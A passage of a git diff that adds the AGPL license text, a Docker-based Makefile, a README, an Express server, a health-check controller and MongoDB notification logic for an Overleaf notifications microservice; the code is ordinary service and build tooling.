their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/notifications/Makefile b/services/notifications/Makefile new file mode 100644 index 0000000..8ca3f98 --- /dev/null +++ b/services/notifications/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = notifications +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/notifications/README.md b/services/notifications/README.md new file mode 100644 index 0000000..da141ce --- /dev/null +++ b/services/notifications/README.md @@ -0,0 +1,20 @@ +overleaf/notifications +=============== + +An API for managing user notifications in Overleaf + + +database indexes +================ + +For notification expiry to work, a TTL index on `notifications.expires` must be created: + +```javascript +db.notifications.createIndex({expires: 1}, {expireAfterSeconds: 10}) +``` + +License +======= +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. + +Copyright (c) Overleaf, 2016–2019. diff --git a/services/notifications/app.js b/services/notifications/app.js new file mode 100644 index 0000000..38292c7 --- /dev/null +++ b/services/notifications/app.js @@ -0,0 +1,65 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +logger.initialize('notifications') +const express = require('express') +const app = express() +const methodOverride = require('method-override') +const bodyParser = require('body-parser') +const { mongoClient } = require('./app/js/mongodb') +const controller = require('./app/js/NotificationsController') + +metrics.memory.monitor(logger) +metrics.open_sockets.monitor() + +const HealthCheckController = require('./app/js/HealthCheckController') + +app.use(methodOverride()) +app.use(bodyParser()) +app.use(metrics.http.monitor(logger)) + +metrics.injectMetricsRoute(app) + +app.post('/user/:user_id', controller.addNotification) +app.get('/user/:user_id', controller.getUserNotifications) +app.delete( + '/user/:user_id/notification/:notification_id', + controller.removeNotificationId +) +app.delete('/user/:user_id', controller.removeNotificationKey) +app.delete('/key/:key', controller.removeNotificationByKeyOnly) +app.get('/key/:key/count', controller.countNotificationsByKeyOnly) +app.delete('/key/:key/bulk', controller.deleteUnreadNotificationsByKeyOnlyBulk) + +app.get('/status', (req, res) => res.send('notifications is up')) + +app.get('/health_check', (req, res) => + HealthCheckController.check(function (err) { + if (err) { + logger.err({ err }, 'error performing health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +) + +app.get('*', (req, res) => res.sendStatus(404)) + +const host = Settings.internal?.notifications?.host || '127.0.0.1' +const port = Settings.internal?.notifications?.port || 3042 + +mongoClient + .connect() + .then(() => { + app.listen(port, host, () => + logger.debug(`notifications starting up, listening on ${host}:${port}`) + ) + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) diff --git a/services/notifications/app/js/HealthCheckController.js b/services/notifications/app/js/HealthCheckController.js new file mode 100644 index 0000000..b08be32 --- /dev/null +++ b/services/notifications/app/js/HealthCheckController.js @@ -0,0 +1,112 @@ +/* eslint-disable + no-dupe-keys, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { db, ObjectId } = require('./mongodb') +const request = require('request') +const async = require('async') +const settings = require('@overleaf/settings') +const { port } = settings.internal.notifications +const logger = require('@overleaf/logger') + +module.exports = { + check(callback) { + const userId = new ObjectId() + const cleanupNotifications = callback => + db.notifications.deleteOne({ user_id: userId }, callback) + + let notificationKey = `smoke-test-notification-${new ObjectId()}` + const getOpts = endPath => ({ + url: `http://127.0.0.1:${port}/user/${userId}${endPath}`, + timeout: 5000, + }) + logger.debug( + { userId, opts: getOpts(), key: notificationKey, userId }, + 'Health Check: running' + ) + const jobs = [ + function (cb) { + const opts = getOpts('/') + opts.json = { + key: notificationKey, + messageOpts: '', + templateKey: 'f4g5', + user_id: userId, + } + return request.post(opts, cb) + }, + function (cb) { + const opts = getOpts('/') + opts.json = true + return request.get(opts, function (err, res, body) { + if (err != null) { + logger.err({ err }, 'Health Check: error getting notification') + return callback(err) + } else if (res.statusCode !== 200) { + const e = `status code not 200 ${res.statusCode}` + logger.err({ err }, e) + return cb(e) + } + const hasNotification = body.some( + notification => + notification.key === notificationKey && + notification.user_id === userId.toString() + ) + if (hasNotification) { + return cb(null, body) + } else { + logger.err( + { body, notificationKey }, + 'Health Check: notification not in response' + ) + return cb(new Error('notification not found in response')) + } + }) + }, + ] + return async.series(jobs, function (err, body) { + if (err != null) { + logger.err({ err }, 'Health Check: error running health check') + return cleanupNotifications(() => callback(err)) + } else { + const notificationId = body[1][0]._id + notificationKey = body[1][0].key + let opts = getOpts(`/notification/${notificationId}`) + logger.debug( + { notificationId, notificationKey }, + 'Health Check: doing cleanup' + ) + return request.del(opts, function (err, res, body) { + if (err != null) { + logger.err( + err, + opts, + 'Health Check: error cleaning up notification' + ) + return callback(err) + } + opts = getOpts('') + opts.json = { key: notificationKey } + return request.del(opts, function (err, res, body) { + if (err != null) { + logger.err( + err, + opts, + 'Health Check: error cleaning up notification' + ) + return callback(err) + } + return cleanupNotifications(callback) + }) + }) + } + }) + }, +} diff --git a/services/notifications/app/js/Notifications.js b/services/notifications/app/js/Notifications.js new file mode 100644 index 0000000..9c4df59 --- /dev/null +++ b/services/notifications/app/js/Notifications.js @@ -0,0 +1,132 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const logger = require('@overleaf/logger') +const { db, ObjectId } = require('./mongodb') + +module.exports = { + getUserNotifications(userId, callback) { + if (callback == null) { + callback = function () {} + } + const query = { + user_id: new ObjectId(userId), + templateKey: { $exists: true }, + } + db.notifications.find(query).toArray(callback) + }, + + _countExistingNotifications(userId, notification, callback) { + if (callback == null) { + callback = function () {} + } + const query = { + user_id: new ObjectId(userId), + key: notification.key, + } + return db.notifications.count(query, function (err, count) { + if (err != null) { + return callback(err) + } + return callback(null, count) + }) + }, + + addNotification(userId, notification, callback) { + return this._countExistingNotifications( + userId, + notification, + function (err, count) { + if (err != null) { + return callback(err) + } + if (count !== 0 && !notification.forceCreate) { + return callback() + } + const doc = { + user_id: new ObjectId(userId), + key: notification.key, + messageOpts: notification.messageOpts, + templateKey: notification.templateKey, + } + // TTL index on the optional `expires` field, which should arrive as an iso date-string, corresponding to + // a datetime in the future when the document should be automatically removed. + // in Mongo, TTL indexes only work on date fields, and ignore the document when that field is missing + // see `README.md` for instruction on creating TTL index + if (notification.expires != null) { + try { + doc.expires = new Date(notification.expires) + const _testValue = doc.expires.toISOString() + } catch (error) { + err = error + logger.error( + { userId, expires: notification.expires }, + 'error converting `expires` field to Date' + ) + return callback(err) + } + } + db.notifications.updateOne( + { user_id: doc.user_id, key: notification.key }, + { $set: doc }, + { upsert: true }, + callback + ) + } + ) + }, + + removeNotificationId(userId, notificationId, callback) { + const searchOps = { + user_id: new ObjectId(userId), + _id: new ObjectId(notificationId), + } + const updateOperation 